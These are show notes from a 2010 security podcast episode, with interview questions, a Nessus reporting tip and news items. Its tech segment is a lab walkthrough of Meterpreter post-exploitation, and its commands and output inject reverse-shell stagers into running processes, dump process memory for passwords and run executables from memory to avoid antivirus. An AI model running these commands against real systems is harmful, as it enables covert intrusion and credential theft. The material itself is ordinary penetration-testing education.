Episode218

From Paul's Security Weekly
Jump to: navigation, search
Palo Alto Networks
Tenable Network Security
The SANS Institute
Pwnie Express
Black Hills Information Security

Sponsors & Announcements

PaulDotCom Security Weekly - Episode 218 - For Thursday November 4th, 2010.

Episode Media

MP3 pt 1

MP3 pt 2

Guest Appearance: Bruce Potter

Fired up for Shmoocon 2011? We certainly are! Bruce will come on to tell us all about it, provide an update on the ticket purchasing process, web site issues, new venue, and more!

Questions:

  1. We all love Shmoocon, and we can all agree it is one of the most well-run conferences out there. Tell us about some of the problems this week and the plan for ticket registrations.
  2. The barcode system will be the same, correct? Will there be a barcode contest like previous years?
  3. Tell us about the new venue.
  4. Are there any talks that have been confirmed yet?
  5. Any new contests?
  6. After last year, have you planned any differently in case of snow?

Guest Interview: Lars Ewe

Lars was last on Episode 176 (1 year ago)

Lars Ewe is a technology executive with broad background in application development and security, middleware infrastructure, software development and application/system manageability technologies. Throughout his career Lars has held key positions in engineering, product management, and sales in a variety of different markets. Prior to Cenzic, Lars was software development director at AMD, where he was responsible for AMD's overall systems manageability and security strategy.

  1. What are some of the web application vulnerabilities that are most difficult to detect using an automated tool and why?
  2. What are the top 2-3 things you can do to tune your automated scanner for the best results when scanning your web applications?
  3. At some point I started thinking that we've done a good job of raising awareness about web application security. Then I see reports like this: https://blogs.sans.org/appsecstreetfighter/2010/11/01/weekly-roundup-web-hacking-incidents-3/?utm_source=rss&utm_medium=rss&utm_campaign=weekly-roundup-web-hacking-incidents-3
  4. Why don't people secure their web applications? Is is a lack of awareness or knowledge or both? Or is it that their risk analysis is way off and most people still think, "Oh, its just the web site, there's no sensitive data there" and ignore the client infection via the web site attacks.
  5. With all of the Adobe Flash 0-days floating around, what can we do to identify vulnerabilities in Flash applications? Is HTML5 our saving grace?
  6. What can we do to improve the web application developer process with respects to security, try to educate the developers or give them tools that make it easier to write secure applications?

Mini Tech Segment: Nessus Vulnerabilities By IP Address

Video


This is an extremely handy report to have. I remember using this report type long ago, and somewhere in the Nessus updates it was no longer provided. However, its back! Thanks to our awesome user community, and specifically Brian Olson. Brian created a stylesheet that lists each vulnerability found, and the IP addresses affected:

SortVulnerabilities.png

I like to create a filter for only the High level alerts, then use this report to review the results. To get the results you will need to copy the xsl file into your $Nessus_Home/var/www/nessus directory, then restart Nessus.

Tech Segment: "Executing from Memory" by Carlos Perez

Video


In the recent conference of Hack3rcon I covered the different arid on a disk than a attacker can leave behind that a crafty System Administrator or a Incident Response Team can find to start a baseline off events taken on a box. One may be called to do a pentest for the only reason to test Incident Response procedures and to exercise the IR team as part of an engagement. Many AV and HIPS monitor disk activity to look for disk activity to check what was written and analyze it making life difficult when one has to upload tools, place secondary connections back as backup of the main session. When one is in this type of environment one Meterpreter has several features that make it an important tool to have. This features are:

  1. Memory Manipulation (Read and Write in a process memory)
  2. Execution of executables from memory
  3. Use of Windows API in the libraries and with Railgun.

This gives Meterpreter a good advantage in post-exploitation. All the regular commands in the Windows Version of Meterpreter run directly from memory no executable of the target is used to perform this tasks, only the necessary DLLs are loaded by the extensions. The same is done by Reailgun that permits an attacker to load systems DLL's in memory and use the functions on this DLL's to further extend Meterpreter capabilities. Now one of the biggest strengths that Metepreter has is the manipulation of memory on a target, this allows Meterpreter to manipulate the memory of it's own process or another process given a PID. Several Scripts exist for simplifying some of the tasks, some of this scripts are: 1. duplicate - For injecting a Meterpreter Reverse TCP Payload into a a process by name or PID, fi none is provided a notepad.exe process will be generated. 2. multi_meter_inject - For injecting on multiple processes a selected Meterpreter payload, you can specify names, pid's or a notepad.exe process will be generated for you. 3. process_memdump - for dumping a selected process by name or pid, you can also specify a list of processes in a text file and it will dump the memory for each one of those processes. Lets cover the duplicate script first, to see the options of all meterpreter scripts the -h option is used:

meterpreter > run duplicate -h

OPTIONS:

    -D        Disable the automatic multi/handler (use with -r to accept on another system)
    -P <opt>  Process id to inject into; use instead of -e if multiple copies of one executable are running.
    -e <opt>  Executable to inject into. Default notepad.exe, will fall back to spawn if not found.
    -h        This help menu
    -p <opt>  The port on the remote host where Metasploit is listening (default: 4546)
    -r <opt>  The IP of a remote Metasploit listening for the connect back
    -s        Spawn new executable to inject to.  Only useful with -P.
    -w        Write and execute an exe instead of injecting into a process


Very useful when you want to share a target with another consultant or test a connection to an external server. To generate a secondary session back your box you could just do:

meterpreter > run duplicate -r 192.168.17.1
[*] Creating a reverse meterpreter stager: LHOST=192.168.17.1 LPORT=4546
[*] Running payload handler
[*] Current server process: meterpreter_hostonly.exe (3464)
[*] Duplicating into notepad.exe...
[+] 
[*] Injecting meterpreter into process ID 2828
[*] Allocated memory at address 0x00bf0000, for 290 byte stager
[*] Writing the stager into memory...
[*] New server process: 2828
meterpreter > [*] Meterpreter session 4 opened (192.168.17.1:4546 -> 192.168.17.128:1053) at 2010-11-04 16:01:32 -0400

Lets say we have a larger team and we would like to inject a session that would go to several of them we could use the multi_meter_inject script:

meterpreter > run multi_meter_inject -h
Meterpreter Script for injecting a reverce tcp Meterpreter Payload
in to memory of multiple PID's, if none is provided a notepad process.
will be created and a Meterpreter Payload will be injected in to each.

OPTIONS:

    -h        Help menu.
    -m        Start Exploit multi/hadler for return connection
    -mp <opt>  Provide Multiple PID for connections separated by comma one per IP.
    -mr <opt>  Provide Multiple IP Addresses for Connections separated by comma.
    -p <opt>  The port on the remote host where Metasploit is listening (default: 4444)
    -pt <opt>  Specify Reverse Connection Meterpreter Payload. Default windows/meterpreter/reverse_tcp

Lets inject into 3 different existing PID's so as to minimize the chance of detection by starting a process:

meterpreter > run multi_meter_inject -mr 192.168.17.1,192.168.17.10,192.168.17.11 -mp 2984,3096,3104
[*] Creating a reverse meterpreter stager: LHOST=192.168.17.1 LPORT=4444
[*] Injecting meterpreter into process ID 2984
[*] Allocated memory at address 0x00b60000, for 290 byte stager
[*] Writing the stager into memory...
[+] Successfully injected Meterpreter in to process: 2984

[*] Sending stage (749056 bytes) to 192.168.17.128
[*] Meterpreter session 5 opened (192.168.17.1:4444 -> 192.168.17.128:1054) at 2010-11-04 16:11:15 -0400
[*] Creating a reverse meterpreter stager: LHOST=192.168.17.10 LPORT=4444
[*] Injecting meterpreter into process ID 3096
[*] Allocated memory at address 0x00c40000, for 290 byte stager
[*] Writing the stager into memory...
[+] Successfully injected Meterpreter in to process: 3096
[*] Creating a reverse meterpreter stager: LHOST=192.168.17.11 LPORT=4444
[*] Injecting meterpreter into process ID 3104
[*] Allocated memory at address 0x01be0000, for 290 byte stager
[*] Writing the stager into memory...
[+] Successfully injected Meterpreter in to process: 3104

Lets say you want to dump the memory of process to look for information, find passwords or all sorts of information, the script for this task is the process_memdump:

meterpreter > run process_memdump -h

USAGE:
EXAMPLE: run process_dump putty.exe
EXAMPLE: run process_dump -p 1234

OPTIONS:

    -h        Help menu.
    -n <opt>  Name of process to dump.
    -p <opt>  PID of process to dump.
    -q        Query the size of the Process that would be dump in bytes.
    -r <opt>  Text file wih list of process names to dump memory for, one per line.
    -t        toggle location information in dump.

Lets find the notepad process, query the size of memory it is using and dump its memory:

meterpreter > ps

Process list
============

 PID   Name                      Arch  Session  User                           Path
 ---   ----                      ----  -------  ----                           ----
 0     [System Process]                                                        
 4     System                    x86   0                                       
 268   smss.exe                  x86   0        NT AUTHORITY\SYSTEM            \SystemRoot\System32\smss.exe
 316   csrss.exe                 x86   0        NT AUTHORITY\SYSTEM            \??\C:\WINDOWS\system32\csrss.exe
 340   winlogon.exe              x86   0        NT AUTHORITY\SYSTEM            \??\C:\WINDOWS\system32\winlogon.exe
 388   services.exe              x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\services.exe
 424   lsass.exe                 x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\lsass.exe
 600   vmacthlp.exe              x86   0        NT AUTHORITY\SYSTEM            C:\Program Files\VMware\VMware Tools\vmacthlp.exe
 616   svchost.exe               x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\svchost.exe
 700   svchost.exe               x86   0                                       C:\WINDOWS\system32\svchost.exe
 760   svchost.exe               x86   0                                       C:\WINDOWS\system32\svchost.exe
 812   svchost.exe               x86   0                                       C:\WINDOWS\system32\svchost.exe
 828   svchost.exe               x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\System32\svchost.exe
 976   spoolsv.exe               x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\spoolsv.exe
 1004  msdtc.exe                 x86   0                                       C:\WINDOWS\system32\msdtc.exe
 1128  httpd.exe                 x86   0        NT AUTHORITY\SYSTEM            C:\xampplite\apache\bin\httpd.exe
 1160  svchost.exe               x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\System32\svchost.exe
 1216  svchost.exe               x86   0                                       C:\WINDOWS\system32\svchost.exe
 1276  vmtoolsd.exe              x86   0        NT AUTHORITY\SYSTEM            C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 1372  VMUpgradeHelper.exe       x86   0        NT AUTHORITY\SYSTEM            C:\Program Files\VMware\VMware Tools\VMUpgradeHelper.exe
 1552  httpd.exe                 x86   0        NT AUTHORITY\SYSTEM            C:\xampplite\apache\bin\httpd.exe
 2180  svchost.exe               x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\System32\svchost.exe
 2252  TPAutoConnSvc.exe         x86   0        NT AUTHORITY\SYSTEM            C:\Program Files\VMware\VMware Tools\TPAutoConnSvc.exe
 2328  dllhost.exe               x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\dllhost.exe
 2664  wmiprvse.exe              x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\wbem\wmiprvse.exe
 2984  explorer.exe              x86   0        CARLOS-BA5A2E78\Administrator  C:\WINDOWS\Explorer.EXE
 3172  TPAutoConnect.exe         x86   0        CARLOS-BA5A2E78\Administrator  C:\Program Files\VMware\VMware Tools\TPAutoConnect.exe
 2620  wuauclt.exe               x86   0        CARLOS-BA5A2E78\Administrator  C:\WINDOWS\system32\wuauclt.exe
 3464  meterpreter_hostonly.exe  x86   0        CARLOS-BA5A2E78\Administrator  C:\Documents and Settings\Administrator\Desktop\meterpreter_hostonly.exe
 732   notepad.exe               x86   0        CARLOS-BA5A2E78\Administrator  C:\WINDOWS\system32\notepad.exe

meterpreter > run process_memdump -q -p 732
[*] 	size for notepad.exe in PID 732 is 4396K
meterpreter > run process_memdump -p 732
[*] Dumping memory for notepad.exe
[*] 	Dumping Memory of notepad.exe with PID: 732
[*] 	base size = 64
[*] 	base size = 128
[*] 	base size = 192
[*] 	base size = 440
[*] 	base size = 444
[*] 	base size = 512
[*] 	base size = 576
[*] 	base size = 640
[*] 	base size = 1664
[*] 	base size = 1728
[*] 	base size = 1856
[*] 	base size = 2176
[*] 	base size = 2496
[*] 	base size = 2560
[*] 	base size = 2624
[*] 	base size = 3392
…………………………..
[*] 	base size = 2097024
[*] Saving Dumped Memory to /Users/cperez/.msf3/logs/scripts/proc_memdump/192.168.17.128_notepad.exe_732_20101104.2953.dmp

Once we have the file we can parse it for information.

One feature rarely used is execution in memory of an executable, this works by uploading the executable to the memory space of a dummy executable executed to hide the executable process or it will run in the memory space of the process where Meterpreter is running in:

meterpreter > execute -f ./meterpreter_hostonly.exe -m -d cmd.exe 

[*] Sending stage (749056 bytes) to 192.168.17.128
Process 308 created.
meterpreter > [*] Meterpreter session 6 opened (192.168.17.1:4444 -> 192.168.17.128:1057) at 2010-11-04 16:40:41 -0400

Here is the dummy cmd.exe process shown in PS:

 308   cmd.exe                   x86   0        CARLOS-BA5A2E78\Administrator  C:\WINDOWS\system32\cmd.exe 

if we do a netstat -nao on the target box we will see the connection back:

  TCP    192.168.17.128:1057    192.168.17.1:4444      ESTABLISHED     308 

very useful if other type of executables are used and other dummy files or under the current process.

Stories For Discussion

  1. A solution to an old problem - No, not that kind. (uhhh, I have no idea…) Some time back I saw this article regarding hacking JBOSS with the JMX console, and I noted that they used a .war file specifically created to give them a command shell. Me, I wanted the .war file that they used and asked our readers for help. So, in my ongoing task of rebuilding my toolset after my change in employment, I rediscovered Laudanum from Secureideas. Guess what is there? yep, all the bits that you need for a jboss command shell, as well as other injectable files for ASP, Coldfusion, JSP and PHP. Expect more on this in the future  :-)
  2. Powerpoint Karaoke Slides - [Larry] - Yes, here's a list of the infamous slides from Brucon. SlideShare, eh? Sounds like a chance to start doing your own…
  3. Break into e-mail, steal nekkid pics, post to Facebook - [Larry] - This gentleman allegedly breaches about 3200 e-mail accounts after trolling Facebook for info to security questions (remember those questions going around, Mr. Johnson?) he was able to grab naked pictures of women from 170 accounts and allegedly post them to face book. Aside form the questions of, "Why don't I know these women?" and " "170 of 3200 accounts sounds like really good odds?" or "Where is this guy's Facebook account?" how about asking some other things, such as the contents of your sent items, and coming up with better security questions or better methods altogether.
  4. Shodan and SCADA - [Larry] - Yet another reason SHODAN is awesome, even though it is dated information, it is still relevant. Nothing like using it to fingerprint and discover control systems directly connected to the internet (Noooo, that NEVER happens), using some fairly well known stuff such as vendor names and industry terms such as "PLC" in combination with some CIDR addresses. I think though, that digging into some deeper stuff would require sone decent knowledges of the devices, industry and vendors. Care to prove me wrong?
  5. Dead Drops or Drop Dead? - [Larry] - Share files via USB humb drive cemented in walls, etc. Sounds like a great idea for spies, and an art installation. How long until these start showing up with malware or with less than honorable intent. Sounds like an interesting use of a PHUCKED device instead of storage.
  6. Bruteforcing SSH Known_hosts Files - [pauldotcom] - Xavier provides us with a fantastic article and new tool that covers brute forcing the hashed known_hosts files. His Perl script, given an IP address or hostname template, it will hash the values, then compare them to the hashes in the known hosts files. This is great if you are performing forensics or on a pen test. For example, if I compromise a DMZ host I can gather the IP subnet info and discover the hosts in known_hosts providing just the subnet info (e.g. ./known_hosts_bruteforcer.pl -i -s 192.168.0.0)
  7. Shodan, SCADA, and good security advice - [pauldotcom] - It should come as no suprise that you can use Shodan to find SCADA devices, even narrowing by IP address and port, then keying in on terms like PLC. The big problem I see here is not even that these devices are on the Internet, but if they are they are likely to not be very locked down. Digital bond recommends not only putting them behind the firewall, but also Virtual Private Networks (VPNs) for remote access, Removing, disabling, or renaming any default system accounts, account loackout, requiring strong passwords, monitoring account creations. I'd also add keeping up with the latest firmware, scrapping passwords in exchange for keypairs, using encrypted managment protocols, and even port knocking. If your device can survive on the Internet, you are in great shape in terms of security.
  8. Checkpoint reboots UTM-1 for you - [pauldotcom] - I think that rebooting has positive effects. Windows for sure, runs so much better when I reboot it! OS X, same thing! However, due to a timer that will roll over every 13.6 years, every device rebooted. I think its great when a vendor helps you perform regular maintenance. I know several groups, such as Windows administrators, that would schedule maintenance and reboot servers once a week or so.
  9. Secure Rogue Development - The software security question, again - [pauldotcom] - Some interesting points in this article, including a new methodology for secure coding called "Rogue Secure Development".
  10. PaulDotCom Philisophical Moment - Some have said that we have created God in our minds to overcome our fear of death. Similar to how we have created compliance to overcome our fears of getting hacked. (Thanks to Ben)
  11. Detecting Firesheep - [pauldotcom] - Using scapy, the smart folks at Zscaler research have created a program to spoof the requests and fill up your Firesheep console. These guys are great, this is the type of defensive thinking that I'm all for, perfect example of offensive countermeasures.
  12. New attack targets HTTP - [pauldotcom] - this is very similar to slowlaris, except I've read that it is not-so-easily filtered. Could spell trouble for web sites for while, before people apply the patch. Of course, once the patch comes out, the tools will be create, carnage will ensue.
  13. Most people don't even know what a rootkit is - [Pauldotcom] - Its been 5 years since the Sony rootkit. I mean, on one hand, if you purchased a Celine Dion or Ricky Martin CD, you deserve it (Neil Diamond is is more than okay, I'm a huge fan! :) The quote that gets me is "Most people don't even know what a rootkit is, so why should they care about it" (Thomas Hesse, Sony BMG). Partly its our fault, we need to educate users beyond telling them "You have a rootkit, thats bad". On the other hand, we can't downplay the dangers just because a technical term like "rootkit" is used.
  14. Call to arms for http-enum.nse - [pauldotcom] - This is a fantastic script from Ron Bowes! It tortures web servers, enumerating directories and fingerprinting the web server and some of its web applications. The fingerprints file is a custom lua format that allows for it to do its job really well. Ron needs your help to populate the fingerprints file!

Other Stories of Interest